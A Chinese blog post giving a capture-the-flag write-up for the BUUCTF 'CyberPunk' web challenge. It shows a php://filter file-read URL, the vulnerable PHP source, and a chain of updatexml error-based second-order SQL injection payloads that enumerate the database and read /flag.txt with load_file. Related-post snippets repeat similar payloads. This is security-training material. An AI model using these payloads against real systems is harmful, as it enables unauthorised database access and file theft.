[CISCN2019 华北赛区 Day1 Web5]CyberPunk

最新推荐文章于 2023-10-08 10:05:37 发布
最新推荐文章于 2023-10-08 10:05:37 发布
阅读量151 收藏
点赞数 1
分类专栏: ctfWP 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20533167/article/details/119281626
版权

[CISCN2019 华北赛区 Day1 Web5]CyberPunk

 
想试一试伪协议写一句话木马,未果 
php伪协议读取源码
http://5418f9f5-c929-42f3-9a4f-6e81a686a6a4.node4.buuoj.cn/?file=php://filter/convert.base64-encode/resource=index.php
  

index.php
<?php


ini_set('open_basedir', '/var/www/html/');


// $file = $_GET["file"];
$file = (isset($_GET['file']) ? $_GET['file'] : null);
if (isset($file)){
    if (preg_match("/phar|zip|bzip2|zlib|data|input|%00/i",$file)) {
        echo('no way!');
        exit;
    }
    @include($file);
}
?>

search.php
<?php


require_once "config.php";


if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }


    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        if(!$row) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "<p>姓名:".$row['user_name']."</p><p>, 电话:".$row['phone']."</p><p>, 地址:".$row['address']."</p>";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>

delete.php
<?php


require_once "config.php";


if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }


    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $result = $db->query('delete from `user` where `user_id`=' . $row["user_id"]);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单删除成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>

change.php
<?php


require_once "config.php";


if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = addslashes($_POST["address"]);
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }


    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
        $result = $db->query($sql);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单修改成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>

其他地方都过滤的很好,但是这里 
change.php中把地址直接拼接进了sql语句,导致出现问题
在修改地址时候会将地址查询出来 再拼接到更 新语句,那么这里就算我们逃逸不了但是可以将后面的单引号给注释掉导致报错,同时这里将sql错误内容给打印出来了,可以使用报错注入。
updatexl注入 
//数据库 1' where user_id=updatexml(1,concat(0x7e,(select substr(database(),1,20)),0x7e),1)# 
//表名 1' where user_id=updatexml(1,concat(0x7e,(select substr(table_name,1,20)from information_schema.tables where table_schema='ctfusers'),0x7e),1)# 
//字段 1' where user_id=updatexml(1,concat(0x7e,(select substr(group_concat(column_name),1,20)from information_schema.columns where table_name='user'),0x7e),1)# 
//数据 
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,20)),0x7e),1)# 
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),20,50)),0x7e),1)#

   
flag{0f27708e-626f-4800-a24c-bb3aa44c57f6}
4pri1
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CISCN2019 华北赛区 Day1 Web5]CyberPunk,网络安全核心知识点
m0_61549781的博客
04-06 817
在index.php页面的响应最下面可以发现提示了?file=?,猜测应该是个读取文件的点尝试伪协议读源码?把所有源码读到本地以后就是代码审计了,可以发现每个页面都对username和phone做了过滤但是并没有对address做过滤,只有在change.php页面对新提交的address做了特殊字符转义,但是还拼接了前一句的查询结果里的address值,这个值可是没有被黑名单过滤,而且还有 一个关键是做了if判断,如果上面的第一个查询结果正确,第二个结果报错就会将报错信息输出。
BUUCTF_练[CISCN2019 华北赛区 Day1 Web5]CyberPunk
最新发布
m0_66225311的博客
10-30 806
`php`伪协议读取文件;源码泄露`hint` ;代码审计 发现二次注入点;SQL语句的二次注入和报错注入结合使用。报错注入进行文件读取操作;`substr`函数配合报错注入输出固定长度和范围的数据
[CISCN2019 华北赛区 Day1 Web5]CyberPunk 二次报错注入
m0_64180167的博客
10-08 7235
buu上 做点首先就是打开环境 开始信息收集发现源代码中存在?file提示我们多半是包含我原本去试了试 ../../etc/passwd失败了 直接伪协议上吧我们通过伪协议全部读取我们提取关键信息。
cyberpunk-web-page-webm
10-29
cyberpunk-web-page-webm
Cyberpunk2077_CYBERPUNK_CheatEngine_
09-29
This is the Cyberpunk Cheat table for the Cheat engine
cyberpunk-2019:emacs需要的Cyber​​punk主题,但也许不值得。
02-05
cyberpunk-2019:emacs需要的Cyber​​punk主题,但也许不值得。
重新记忆Web版:重新:记忆Web
02-06
回复:_记住网络版
augmented-ui:赛博朋克风格的Web UI变得容易。 得到增强
04-13
http : //augmented-ui.com/v1/test.html unpkg: https ://unpkg.com/augmented-ui@1/augmented.css 安装: $ npm install augmented-ui /node_modules/augmented-ui/augmented-ui.min.css $ npm install ...
mysql注入ctf_BUUCTF[归纳]sql注入相关题目
weixin_42322347的博客
02-02 1567
这是我自己对于sql注入的部分ctf题型的归纳,均来自buuctf的平台环境。[0CTF 2016]piapiapia我尝试了几种payload,发现有两种情况。第一种:Invalid user name第二种:Invalid user name or password第一步想到的是盲注或者报错,因为fuzz一波有一些是没有过滤掉的。对于后台的拦截我想到的可能是黑名单或者是正则表达式匹配。先不管,...
[CISCN2019 华北赛区 Day1 Web5]CyberPunk题解
lonmar的博客
02-02 890
前言 考察二次注入 有关这方面总结: 网鼎杯2018-commit题解&二次注入&addslashes安全问题&insert注入 题解 根据提示,读取代码 然后把代码都读出来,进行审计.在change.php,发现了address仅用addslashes进行处理,而且插入数据库中的address会在下次查询中插入到新的dal语句中,存在二次注入 然后尝试下MySQL insert语句特性 所以可以尝试构造payload: address=’,`address`=(sql语句.
web入门-文件包含
wo41ge的博客
11-28 3269
web78~php伪协议 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 直接payload ?file=php://filter/read=convert.base64-encode/resource=flag.php web79~Data协议 <?php if(isset($_GET['file
buu-[CISCN2019 华北赛区 Day1 Web5]CyberPunk
qaq517384的博客
10-10 254
F12能看到提示 ?file猜测文件包含,先是伪协议读源码 ?file=php://filter/convert.base64-encode/resource=index.php <?php //index.php ini_set('open_basedir', '/var/www/html/'); // $file = $_GET["file"]; $file = (isset($_GET['file']) ? $_GET['file'] : null); if (isset($file)){
BUUCTF刷题记录(6)
bmth666的博客
05-14 4745
文章目录web[FBCTF2019]RCEService web 打ctf(×) 被ctf打(√) [FBCTF2019]RCEService 首先查看文件夹文件,{"cmd":"ls"} 然后输入其他的发现被ban了,看wp得源码 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { ...
【CTFSHOW】web入门文件包含
7ruth0hn的博客
07-23 1496
【CTFSHOW】web入门文件包含 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 没有过滤,一开始想直接包含flag.php,发现一片空白。使用php://filter伪协议读取flag.php内容,进行base64解码得到flag。 payload: ?file=php://filter/convert.base6
BUUCTF-[CISCN2019 华北赛区 Day1 Web5]CyberPunk
AndyNoel的博客
05-13 435
BUUCTF-[CISCN2019 华北赛区 Day1 Web5]CyberPunk 看题 看源码有提示?file=? 文件包含漏洞,可以利用这个漏洞读取源码。 分析 index.php?file=php://filter/read=convert.base64-encode/resource=change.php 挨个读取完后,base64解码后,在change.php发现了一点问题 <?php require_once "config.php"; if(!empty($_POST["us
用python的pillow写一个程序,将一个城市图片赛博朋克化
05-11
cyberpunk_image = cyberpunk_image.filter(ImageFilter.CONTOUR) # 保存处理后的图片 cyberpunk_image.save('cyberpunk_city.jpg') ``` 这个程序将原始城市图片转换为黑白,添加噪点,反转颜色,最后应用赛博朋克...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值